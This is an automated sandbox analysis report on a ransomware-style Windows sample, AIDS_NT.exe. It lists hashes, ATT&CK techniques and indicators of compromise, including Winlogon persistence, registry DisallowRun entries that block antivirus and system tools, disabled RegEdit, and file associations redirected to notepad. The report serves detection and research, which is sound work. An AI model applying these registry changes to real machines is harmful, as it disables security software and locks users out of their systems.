eadaf26df948f0fd541f297e2f0bad435aa4bee5c97e4324ad767dacca77e29d

Analysis

max time kernel
51s
max time network
55s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
09-05-2023 19:16

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

AIDS_NT.exe
Size

924KB
MD5

14eefb80a0813abbf8710387a5383f08
SHA1

d3fa355cc1d184be20b441143fa34e4ae1a4bdb2
SHA256

61ee3bd82bed03dd0f3fb9bc9b76b7da972a90d3c12c8e4d5e967440a2f04c00
SHA512

a3174a80c47a02b6deed6eb390a999fa486f7a4cda7ab614d93589f614a60ba500aa8f42346e80cc53b7e1a5af0f0e515e4b014d23e5af90fabeae504f43f130
SSDEEP

12288:/GqN/XdctpVtkkKICgvDkBLab3Xldfr4oSsFsA0cO4KfRErkYzWaMSDncS:pNcBtkUHf9ace3sJTcS

Score

10^/10

evasion persistence ransomware upx

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Windows\\AIDS_NT_Instructions.txt, C:\\Windows\\aids.bat, C:\\Windows\\42.exe, C:\\Windows\\1.bat"	reg.exe

Nirsoft 1 IoCs

Processes:

resource	yara_rule
behavioral6/memory/3868-187-0x0000000000400000-0x000000000041C000-memory.dmp	Nirsoft

Blocks application from running via registry modification 64 IoCs

Adds application to list of disallowed applications.

evasion

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\35 = "MfeAVSvc.exe "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\70 = "ProductAgentUI.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\121 = "cmd.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "CCleaner.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\56 = "mbamtray.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "msmpeng.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "msconfig.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\87 = "eguiProxy.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\116 = "MicrosoftEdgeCP.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "SearchUI.exe "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\81 = "BdVpnService.exe "	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\32 = "McPvTray.exe "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\115 = "MicrosoftEdge.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "perfmon.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\94 = "aswEngSrv.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\107 = "MRT.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\82 = "BdVpnApp.exe "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MSASCui.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "CCleaner64.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "msdt.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\44 = "vmware.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\79 = "procexp.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "iexplore.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\62 = "malwarebytes_assistant.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\34 = "McUICnt.exe "	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\59 = "MbamPt.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\77 = "7zFM.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\89 = "AvastNM.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "firefox.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2200 attrib.exe

pid	process
2200	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AIDS_NT.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	AIDS_NT.exe

Executes dropped EXE 1 IoCs

Processes:

nircmd.exe

pid process

3868 nircmd.exe

pid	process
3868	nircmd.exe

Modifies system executable filetype association 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1042

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "notepad.exe"	reg.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\42.exe	upx
C:\Windows\42.exe	upx
C:\Windows\nircmd.exe	upx
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe	upx
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe	upx
behavioral6/memory/3868-187-0x0000000000400000-0x000000000041C000-memory.dmp	upx

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\1.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\1.jpg"	reg.exe

Drops file in Windows directory 12 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Windows\AIDS_NT_Instructions.txt	cmd.exe
File opened for modification	C:\Windows\nircmd.exe	cmd.exe
File created	C:\Windows\aids.bat	cmd.exe
File opened for modification	C:\Windows\aids.bat	cmd.exe
File opened for modification	C:\Windows\42.exe	cmd.exe
File created	C:\Windows\1.jpg	cmd.exe
File created	C:\Windows\42.exe	cmd.exe
File opened for modification	C:\Windows\1.jpg	cmd.exe
File created	C:\Windows\AIDS_NT_Instructions.txt	cmd.exe
File created	C:\Windows\nircmd.exe	cmd.exe
File created	C:\Windows\1.bat	cmd.exe
File opened for modification	C:\Windows\1.bat	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "87"	LogonUI.exe

Modifies registry class 64 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\oggfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\zipfile\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tiffile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dmgfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ctfile\shell\open	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mp4file\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\oggfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\001file\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell\open\command\ = "notepad.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cppfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\afile\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\curfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\slnfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\vbsfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\pdffile\shell\open	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\docfile\shell\open\command\ = "notepad.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\oggfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\7zfile\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\aafile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\icofile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\isofile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tiffile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mkvfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\hfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\zipfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cabfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\curfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\logfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\csvfile\shell\open	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\aafile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\rarfile\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\jpgfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tmpfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\wsffile\shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WSFFile\Shell\Open\Command\ = "notepad.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\pdffile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\docxfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\pptfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\asmfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\docfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xlsxfile\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\7zfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\bmpfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cfgfile\shell\open	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WSHFile\Shell\Open\Command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cppfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\logfile\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\docxfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\7zfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\afile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\aafile\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cplfile\shell\open\command	reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

AIDS_NT.exeshutdown.exe

description	pid	process
Token: SeSecurityPrivilege	4196	AIDS_NT.exe
Token: SeRestorePrivilege	4196	AIDS_NT.exe
Token: SeShutdownPrivilege	4092	shutdown.exe
Token: SeRemoteShutdownPrivilege	4092	shutdown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

LogonUI.exe

pid process

5116 LogonUI.exe

pid	process
5116	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

AIDS_NT.execmd.execmd.exenet.exe

description	pid	process	target process
PID 4196 wrote to memory of 2552	4196	AIDS_NT.exe	cmd.exe
PID 4196 wrote to memory of 2552	4196	AIDS_NT.exe	cmd.exe
PID 4196 wrote to memory of 2552	4196	AIDS_NT.exe	cmd.exe
PID 2552 wrote to memory of 1852	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 1852	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 1852	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 320	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 320	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 320	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 236	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 236	2552	cmd.exe	reg.exe
PID 2552 wrote to memory of 236	2552	cmd.exe	reg.exe
PID 4196 wrote to memory of 3908	4196	AIDS_NT.exe	cmd.exe
PID 4196 wrote to memory of 3908	4196	AIDS_NT.exe	cmd.exe
PID 4196 wrote to memory of 3908	4196	AIDS_NT.exe	cmd.exe
PID 3908 wrote to memory of 3868	3908	cmd.exe	nircmd.exe
PID 3908 wrote to memory of 3868	3908	cmd.exe	nircmd.exe
PID 3908 wrote to memory of 3868	3908	cmd.exe	nircmd.exe
PID 3908 wrote to memory of 2200	3908	cmd.exe	attrib.exe
PID 3908 wrote to memory of 2200	3908	cmd.exe	attrib.exe
PID 3908 wrote to memory of 2200	3908	cmd.exe	attrib.exe
PID 3908 wrote to memory of 4384	3908	cmd.exe	net.exe
PID 3908 wrote to memory of 4384	3908	cmd.exe	net.exe
PID 3908 wrote to memory of 4384	3908	cmd.exe	net.exe
PID 4384 wrote to memory of 4560	4384	net.exe	net1.exe
PID 4384 wrote to memory of 4560	4384	net.exe	net1.exe
PID 4384 wrote to memory of 4560	4384	net.exe	net1.exe
PID 3908 wrote to memory of 796	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 796	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 796	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4500	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4500	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4500	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 1148	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 1148	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 1148	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 1516	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 1516	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 1516	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 2992	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 2992	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 2992	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4456	3908	cmd.exe	reg.exe
PID 3908 wrote to memory of 4456	3908	cmd.exe	reg.exe
